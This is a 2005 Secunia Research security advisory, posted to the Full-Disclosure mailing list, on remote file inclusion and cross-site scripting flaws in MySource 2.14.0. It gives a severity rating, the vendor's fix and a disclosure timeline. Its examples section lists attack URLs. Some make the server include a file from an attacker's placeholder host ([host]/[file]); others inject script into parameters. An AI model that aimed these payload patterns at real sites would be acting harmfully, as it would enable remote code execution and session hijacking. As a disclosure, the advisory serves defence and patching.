[Full-disclosure] Secunia Research: MySource Cross-Site Scripting and File Inclusion Vulnerabilities

From: Secunia Research (vuln_at_secunia.com)
Date: 10/18/05

  • Next message: Clayton Kossmeyer: "Re: [Full-disclosure] Ciscos VPN-Client-Passwords can be decrypted" 
    To: full-disclosure@lists.grok.org.uk
Date: Tue, 18 Oct 2005 16:53:53 +0200

    ======================================================================

                         Secunia Research 18/10/2005

     - MySource Cross-Site Scripting and File Inclusion Vulnerabilities -

    ======================================================================
    Table of Contents

    Affected Software....................................................1
    Severity.............................................................2
    Vendor's Description of Software.....................................3
    Description of Vulnerabilities.......................................4
    Solution.............................................................5
    Time Table...........................................................6
    Credits..............................................................7
    About Secunia........................................................8
    Verification.........................................................9

    ======================================================================
    1) Affected Software

    MySource 2.14.0

    Prior versions may also be affected.

    ======================================================================
    2) Severity

    Rating: Highly critical
    Impact: Cross-site scripting and system access
    Where: Remote

    ======================================================================
    3) Vendor's Description of Software

    MySource is a powerful, open source website and intranet content
    publishing and management system. It is designed to enable
    technically unskilled users to build and maintain their own web
    solutions securely, professionally and inexpensively.

    Product link:
    http://mysource.squiz.net/

    ======================================================================
    4) Description of Vulnerabilities

    Secunia Research has discovered some vulnerabilities in MySource,
    which can be exploited by malicious people to conduct
    cross-site scripting attacks and compromise a vulnerable system.

    1) Some input isn't properly verified, before it used to include
    files. This can be exploited to include arbitrary files from external
    and local resources.

    Examples:
    http://[victim]/web/edit/upgrade_functions/new_upgrade_functions.php?
    INCLUDE_PATH=http://[host]/[file]?
    http://[victim]/web/edit/upgrade_functions/new_upgrade_functions.php?
    SQUIZLIB_PATH=http://[host]/[file]?
    http://[victim]/web/init_mysource.php?
    INCLUDE_PATH=http://[host]/[file]?
    http://[victim]/pear/Net_Socket/Socket.php?
    PEAR_PATH=http://[host]/[file]?
    http://[victim]/pear/HTTP_Request/Request.php?
    PEAR_PATH=http://[host]/[file]?
    http://[victim]/pear/Mail/Mail.php?
    PEAR_PATH=http://[host]/[file]?
    http://[victim]/pear/Date/Date.php?
    PEAR_PATH=http://[host]/[file]?
    http://[victim]/pear/Date/Date/Span.php?
    PEAR_PATH=http://[host]/[file]?
    http://[victim]/pear/Mail_Mime/mimeDecode.php?
    PEAR_PATH=http://[host]/[file]?
    http://[victim]/pear/Mail_Mime/mime.php?
    PEAR_PATH=http://[host]/[file]?

    Successful exploitation requires that "register_globals" is enabled
    and that the affected scripts are placed accessible inside the
    web root.

    2) Some input isn't properly sanitised before being returned to the
    user. This can be exploited to execute arbitrary HTML and script code
    in a user's browser session in context of an affected site.

    Examples:
    http://[victim]/web/edit/upgrade_in_progress_backend.php?
    target_url=">[code]
    http://[victim]/squizlib/bodycopy/pop_ups/insert_table.php?
    bgcolor=</style>[code]
    http://[victim]/squizlib/bodycopy/pop_ups/edit_table_cell_props.php?
    bgcolor=</style>[code]
    http://[victim]/squizlib/bodycopy/pop_ups/header.php?
    bgcolor=</style>[code]
    http://[victim]/squizlib/bodycopy/pop_ups/edit_table_row_props.php?
    bgcolor=</style>[code]
    http://[victim]/squizlib/bodycopy/pop_ups/edit_table_props.php?
    bgcolor=</style>[code]
    http://[victim]/squizlib/bodycopy/pop_ups/
    edit_table_cell_type_wysiwyg.php?style***=">[code]

    Successful exploitation requires that "register_globals" is enabled
    and that the affected scripts are placed accessible inside the
    web root.

    The vulnerabilities have been confirmed in version 2.14.0. Prior
    versions may also be affected.

    ======================================================================
    5) Solution

    The vendor has fixed the vulnerabilities in version 2.14.2 by warning
    the user during the installation process about the security risks of
    placing MySource script files in a publicly available folder and
    having "register_globals" enabled.

    Users should set "register_globals" to "Off" and ensure that the
    MySource installation is moved out of the web root.

    Installation process updated in version 2.14.2:
    http://mysource.squiz.net/download/downloads/download_2.14.2

    ======================================================================
    6) Time Table

    30/09/2005 - Vulnerabilities discovered.
    03/10/2005 - Vendor notified.
    18/10/2005 - Vendor releases new version.
    18/10/2005 - Public disclosure.

    ======================================================================
    7) Credits

    Discovered by Secunia Research.

    ======================================================================
    8) About Secunia

    Secunia collects, validates, assesses, and writes advisories regarding
    all the latest software vulnerabilities disclosed to the public. These
    advisories are gathered in a publicly available database at the
    Secunia website:

    http://secunia.com/

    Secunia offers services to our customers enabling them to receive all
    relevant vulnerability information to their specific system
    configuration.

    Secunia offers a FREE mailing list called Secunia Security Advisories:

    http://secunia.com/secunia_security_advisories/

    ======================================================================
    9) Verification

    Please verify this advisory by visiting the Secunia website:
    http://secunia.com/secunia_research/2005-51/advisory/

    ======================================================================

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/

  • Next message: Clayton Kossmeyer: "Re: [Full-disclosure] Ciscos VPN-Client-Passwords can be decrypted"